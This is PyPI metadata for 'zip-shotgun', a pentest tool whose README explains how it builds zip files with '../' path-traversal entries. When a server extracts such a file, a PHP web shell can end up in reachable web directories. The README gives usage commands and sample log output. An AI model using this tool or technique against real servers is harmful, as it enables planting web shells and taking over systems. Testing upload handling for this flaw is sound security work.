{ "info": { "author": "Janusz Piech\u00f3wka (https://github.com/jpiechowka)", "author_email": "", "bugtrack_url": null, "classifiers": [ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: End Users/Desktop", "Intended Audience :: Information Technology", "Intended Audience :: System Administrators", "License :: OSI Approved :: GNU General Public License v3 (GPLv3)", "Natural Language :: English", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: Implementation :: CPython", "Topic :: Security", "Topic :: Utilities" ], "description": "# ZIP Shotgun\n\nUtility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities.\nIdea for this script comes from this post on [Silent Signal Techblog - Compressed File Upload And Command Execution](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)\nand from [OWASP - Test Upload of Malicious Files](https://www.owasp.org/index.php/Test_Upload_of_Malicious_Files_%28OTG-BUSLOGIC-009%29)\n\nThis script will create archive which contains files with \"../\" in filename. When extracting this could cause files to be extracted to preceding directories.\nIt can allow attacker to extract shells to directories which can be accessed from web browser.\n\nDefault webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available [HERE](https://github.com/WhiteWinterWolf/wwwolf-php-webshell)\n\n### Installation\n\n1. Install using Python pip\n\n ```pip install zip-shotgun --upgrade```\n\n2. Clone git repository and install\n\n ```git clone https://github.com/jpiechowka/zip-shotgun.git```\n\n Execute from root directory of the cloned repository (where setup.py file is located)\n\n ```pip install . --upgrade```\n\n### Usage and options\n\n```\nUsage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE\n\nOptions:\n --version Show the version and exit.\n -c, --directories-count INTEGER\n Count of how many directories to go back\n inside the zip file (e.g 3 means that 3\n files will be added to the zip: shell.php,\n ../shell.php and ../../shell.php where\n shell.php is the name of the shell you\n provided or randomly generated value\n [default: 16]\n -n, --shell-name TEXT Name of the shell inside the generated zip\n file (e.g shell). If not provided it will be\n randomly generated. Cannot have whitespaces\n -f, --shell-file-path PATH A file that contains code for the shell. If\n this option is not provided wwwolf\n (https://github.com/WhiteWinterWolf/wwwolf-\n php-webshell) php shell will be added\n instead. If name is provided it will be\n added to the zip with the provided name or\n if not provided the name will be randomly\n generated.\n --compress Enable compression. If this flag is set\n archive will be compressed using DEFALTE\n algorithm with compression level of 9. By\n default there is no compression applied.\n -h, --help Show this message and exit.\n```\n\n### Examples\n\n1. Using all default options\n\n ```zip-shotgun archive.zip```\n\n Part of the script output\n\n ```\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\\zip-shotgun\\archive.zip\n 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj\n 12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php\n ...\n 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL\n ```\n\n2. Using default options and enabling compression for archive file\n\n ```zip-shotgun --compress archive.zip```\n\n Part of the script output\n\n ```\n 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\\zip-shotgun\\archive.zip\n 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh\n 12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code\n 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php\n 12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9\n ...\n 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL\n ```\n\n3. Using default options but changing the number of directories to go back in the archive to 3\n\n ```zip-shotgun --directories-count 3 archive.zip```\n\n ```zip-shotgun -c 3 archive.zip```\n\n The script will write 3 files in total to the archive\n\n Part of the script output\n\n ```\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\\zip-shotgun\\archive.zip\n 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F\n 12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php\n 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL\n ```\n\n4. Using default options but providing shell name inside archive and enabling compression\n\n Shell name cannot have whitespaces\n\n ```zip-shotgun --shell-name custom-name --compress archive.zip```\n\n ```zip-shotgun -n custom-name --compress archive.zip```\n\n Name for shell files inside the archive will be set to the one provided by the user.\n\n Part of the script output\n\n ```\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\\zip-shotgun\\archive.zip\n 12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php\n ...\n 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL\n ```\n\n5. Provide custom shell file but use random name inside archive. Set directories count to 3\n\n ```zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip```\n\n ```zip-shotgun -c 3 -f ./custom-shell.php archive.zip```\n\n Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.\n\n Part of the script output\n\n ```\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\\zip-shotgun\\archive.zip\n 12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\\zip-shotgun\\custom-shell.php. Content will be added to archive\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\\zip-shotgun\\custom-shell.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php\n 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL\n ```\n\n6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression\n\n ```zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip```\n\n ```zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip```\n\n Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.\n\n Part of the script output\n\n ```\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\\zip-shotgun\\archive.zip\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\\zip-shotgun\\custom-shell.php. Content will be added to archive\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\\zip-shotgun\\custom-shell.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php\n 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL\n ```\n\n\n", "description_content_type": "text/markdown", "docs_url": null, "download_url": "", "downloads": { "last_day": -1, "last_month": -1, "last_week": -1 }, "home_page": "https://github.com/jpiechowka/zip-shotgun", "keywords": "security pentest hacking zip", "license": "GNU General Public License v3.0", "maintainer": "", "maintainer_email": "", "name": "zip-shotgun", "package_url": "https://pypi.org/project/zip-shotgun/", "platform": "", "project_url": "https://pypi.org/project/zip-shotgun/", "project_urls": { "Homepage": "https://github.com/jpiechowka/zip-shotgun" }, "release_url": "https://pypi.org/project/zip-shotgun/1.0.2/", "requires_dist": [ "click (~=7.0)", "typeguard (~=2.2)" ], "requires_python": ">=3.6", "summary": "Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities", "version": "1.0.2" }, "last_serial": 4592211, "releases": { "1.0.1": [ { "comment_text": "", "digests": { "md5": "b30e6ccf5e2b0c6439f26bd6c4e76bd6", "sha256": "dd98d71f096fcc357131cd4586e2e8be8fc4d278e56b2b54e1ce3baa8a6ff52f" }, "downloads": -1, "filename": "zip_shotgun-1.0.1-py3-none-any.whl", "has_sig": false, "md5_digest": "b30e6ccf5e2b0c6439f26bd6c4e76bd6", "packagetype": "bdist_wheel", "python_version": "py3", "requires_python": ">=3.6", "size": 22414, "upload_time": "2018-12-12T23:24:21", "url": "https://files.pythonhosted.org/packages/23/f3/4a727b7c8dce8f85e064ccb5ad1e2202d11c0a1ea01d4a5732e797ec0c03/zip_shotgun-1.0.1-py3-none-any.whl" }, { "comment_text": "", "digests": { "md5": "835606dd2b283c6438114236da5c3bb0", "sha256": "2369b23e4a00c4a59e246889d2f57965805eb98d474f3bade02b08da7ca9f20d" }, "downloads": -1, "filename": "zip-shotgun-1.0.1.tar.gz", "has_sig": false, "md5_digest": "835606dd2b283c6438114236da5c3bb0", "packagetype": "sdist", "python_version": "source", "requires_python": ">=3.6", "size": 10540, "upload_time": "2018-12-12T23:24:23", "url": "https://files.pythonhosted.org/packages/fb/52/e5b1cd5f79d729381a6cc6414e9ffaadc22557067f1af12abbec59ea4973/zip-shotgun-1.0.1.tar.gz" } ], "1.0.2": [ { "comment_text": "", "digests": { "md5": "3f9d17ece02406ada4cd3264a809916e", "sha256": "f23ae990a71ff1b81adf07a25363784f050d50d6b94910d81841c4a264fd21d1" }, "downloads": -1, "filename": "zip_shotgun-1.0.2-py3-none-any.whl", "has_sig": false, "md5_digest": "3f9d17ece02406ada4cd3264a809916e", "packagetype": "bdist_wheel", "python_version": "py3", "requires_python": ">=3.6", "size": 22520, "upload_time": "2018-12-12T23:33:10", "url": "https://files.pythonhosted.org/packages/a0/85/c26610313a341106b813075ac9cb4d7cf30eaa471ed7307c4f3a12b0effc/zip_shotgun-1.0.2-py3-none-any.whl" }, { "comment_text": "", "digests": { "md5": "7ac77a16e8df7ee07cffe9d1dece5908", "sha256": "d49449a8807ae3f4632728c47417de287e632085ddbbc83d2baa7983e4270527" }, "downloads": -1, "filename": "zip-shotgun-1.0.2.tar.gz", "has_sig": false, "md5_digest": "7ac77a16e8df7ee07cffe9d1dece5908", "packagetype": "sdist", "python_version": "source", "requires_python": ">=3.6", "size": 10766, "upload_time": "2018-12-12T23:33:12", "url": "https://files.pythonhosted.org/packages/ec/e6/d2ce53a23f54335b2efcc73dddd0f7f78f36cda202490a9d725ec4625aed/zip-shotgun-1.0.2.tar.gz" } ] }, "urls": [ { "comment_text": "", "digests": { "md5": "3f9d17ece02406ada4cd3264a809916e", "sha256": "f23ae990a71ff1b81adf07a25363784f050d50d6b94910d81841c4a264fd21d1" }, "downloads": -1, "filename": "zip_shotgun-1.0.2-py3-none-any.whl", "has_sig": false, "md5_digest": "3f9d17ece02406ada4cd3264a809916e", "packagetype": "bdist_wheel", "python_version": "py3", "requires_python": ">=3.6", "size": 22520, "upload_time": "2018-12-12T23:33:10", "url": "https://files.pythonhosted.org/packages/a0/85/c26610313a341106b813075ac9cb4d7cf30eaa471ed7307c4f3a12b0effc/zip_shotgun-1.0.2-py3-none-any.whl" }, { "comment_text": "", "digests": { "md5": "7ac77a16e8df7ee07cffe9d1dece5908", "sha256": "d49449a8807ae3f4632728c47417de287e632085ddbbc83d2baa7983e4270527" }, "downloads": -1, "filename": "zip-shotgun-1.0.2.tar.gz", "has_sig": false, "md5_digest": "7ac77a16e8df7ee07cffe9d1dece5908", "packagetype": "sdist", "python_version": "source", "requires_python": ">=3.6", "size": 10766, "upload_time": "2018-12-12T23:33:12", "url": "https://files.pythonhosted.org/packages/ec/e6/d2ce53a23f54335b2efcc73dddd0f7f78f36cda202490a9d725ec4625aed/zip-shotgun-1.0.2.tar.gz" } ] }